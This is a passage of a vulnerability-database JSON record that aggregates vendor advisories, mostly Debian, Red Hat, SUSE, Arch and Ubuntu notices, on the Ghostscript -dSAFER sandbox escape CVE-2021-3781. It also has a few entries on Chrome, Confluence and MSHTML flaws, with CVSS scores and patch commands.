"description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4972-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 10, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ghostscript\nCVE ID : CVE-2021-3781\nDebian Bug : 994011\n\nIt was discovered that Ghostscript, the GPL PostScript/PDF interpreter,\ndoes not properly validate access for the "%pipe%", "%handle%" and\n"%printer%" io devices, which could result in the execution of arbitrary\ncode if a malformed Postscript file is processed (despite the -dSAFER\nsandbox being enabled).\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 9.53.3~dfsg-7+deb11u1.\n\nWe recommend that you upgrade your ghostscript packages.\n\nFor the detailed security status of ghostscript please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ghostscript\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-10T12:16:01", "type": "debian", "title": "[SECURITY] [DSA 4972-1] ghostscript security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-10T12:16:01", "id": "DEBIAN:DSA-4972-1:EB781", "href": "https://lists.debian.org/debian-security-announce/2021/msg00157.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T06:45:10", "description": "ghostscript:edge is vulnerable to Remote Code Execution. An attacker is able to inject malicious code on the system in the context of the ghostscript interpreter. \n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-11T11:12:35", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2023-01-31T19:33:33", "id": "VERACODE:32050", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32050/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-17T12:48:33", "description": "chromium is vulnerable to denial of service. The vulnerability exists due to an Out of bounds write in V8.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T02:04:59", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-11-24T00:11:16", "id": "VERACODE:32108", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32108/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-07-11T14:59:40", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-10T10:57:44", "type": "redhatcve", "title": "CVE-2021-3781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2023-07-11T11:47:52", "id": "RH:CVE-2021-3781", "href": "https://access.redhat.com/security/cve/cve-2021-3781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2023-02-08T16:23:58", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. ([CVE-2021-3781](<https://vulners.com/cve/CVE-2021-3781>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-21T20:23:00", "type": "f5", "title": "Ghostscript vulnerability CVE-2021-3781", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2022-03-01T23:12:00", "id": "F5:K04481502", "href": "https://support.f5.com/csp/article/K04481502", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2022-04-18T12:40:04", "description": "An update that solves one vulnerability and has one errata\n is now available.\n\nDescription:\n\n This update for ghostscript fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2021-3781: Fixed a trivial -dSAFER bypass command injection\n (bsc#1190381)\n\n Also a hardening fix was added:\n\n - Link as position independent executable (bsc#1184123)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-1273=1", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-16T00:00:00", "type": "suse", "title": "Security update for ghostscript (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-16T00:00:00", "id": "OPENSUSE-SU-2021:1273-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/H36LVLBVTFLQTYOKRPFVWGCDCWJQWKLY/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:04", "description": "An update that solves one vulnerability and has one errata\n is now available.\n\nDescription:\n\n This update for ghostscript fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2021-3781: Fixed a trivial -dSAFER bypass command injection\n (bsc#1190381)\n\n Also a hardening fix was added:\n\n - Link as position independent executable (bsc#1184123)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-3044=1", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-15T00:00:00", "type": "suse", "title": "Security update for ghostscript (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-15T00:00:00", "id": "OPENSUSE-SU-2021:3044-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/M64NXCVRRUDYD4U65CYH2ROCOGMSYF3U/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:00", "description": "A remote code execution vulnerability exists in Microsoft Open Management Infrastructure. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Open Management Infrastructure Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-21T00:00:00", "id": "CPAI-2021-0684", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:00", "description": "An out of bounds write vulnerability exists in Google Chrome V8. Successful exploitation of this vulnerability could cause heap corruption in the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-19T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome V8 Out-of-Bounds Write (CVE-2021-30632)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2021-0685", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2023-05-23T16:20:53", "description": "Arch Linux Security Advisory ASA-202109-3\n=========================================\n\nSeverity: High\nDate : 2021-09-14\nCVE-ID : CVE-2021-3781\nPackage : ghostscript\nType : arbitrary command execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-2374\n\nSummary\n=======\n\nThe package ghostscript before version 9.54.0-3 is vulnerable to\narbitrary command execution.\n\nResolution\n==========\n\nUpgrade to 9.54.0-3.\n\n# pacman -Syu \"ghostscript>=9.54.0-3\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA trivial sandbox (enabled with the -dSAFER option) escape security\nissue was found in the ghostscript interpreter by injecting a specially\ncrafted pipe command. This flaw allows a specially crafted document to\nexecute arbitrary commands on the system in the context of the\nghostscript interpreter.\n\nImpact\n======\n\nAn attacker could execute arbitrary commands through crafted documents,\nbypassing the interpreter's sandbox.\n\nReferences\n==========\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=2002271\nhttps://bugs.ghostscript.com/show_bug.cgi?id=704342\nhttps://twitter.com/emil_lerner/status/1430502815181463559\nhttps://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50\nhttps://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde03327a4a2c69dad1036bf9632e20\nhttps://security.archlinux.org/CVE-2021-3781", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-14T00:00:00", "type": "archlinux", "title": "[ASA-202109-3] ghostscript: arbitrary command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-14T00:00:00", "id": "ASA-202109-3", "href": "https://security.archlinux.org/ASA-202109-3", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:06:26", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T19:15:00", "type": "alpinelinux", "title": "CVE-2021-3781", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2023-01-31T17:29:00", "id": "ALPINE:CVE-2021-3781", "href": "https://security.alpinelinux.org/vuln/CVE-2021-3781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T11:05:32", "description": "Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-08T21:15:00", "type": "alpinelinux", "title": "CVE-2021-30632", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2023-06-12T07:15:00", "id": "ALPINE:CVE-2021-30632", "href": "https://security.alpinelinux.org/vuln/CVE-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-06-26T21:06:05", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "cvss3": {}, "published": "2022-02-16T19:15:00", "type": "osv", "title": "CVE-2021-3781", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2023-06-26T21:06:01", "id": "OSV:CVE-2021-3781", "href": "https://osv.dev/vulnerability/CVE-2021-3781", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2023-06-29T13:47:51", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found\nin the ghostscript interpreter by injecting a specially crafted pipe\ncommand. This flaw allows a specially crafted document to execute arbitrary\ncommands on the system in the context of the ghostscript interpreter. The\nhighest threat from this vulnerability is to confidentiality, integrity, as\nwell as system availability.\n\n#### Bugs\n\n * <https://bugs.ghostscript.com/show_bug.cgi?id=704342>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | 9.50 to 9.55 are vulnerable\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-08T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-08T00:00:00", "id": "UB:CVE-2021-3781", "href": "https://ubuntu.com/security/CVE-2021-3781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-29T13:46:25", "description": "Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "ubuntucve", "title": "CVE-2021-30632", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-10-08T00:00:00", "id": "UB:CVE-2021-30632", "href": 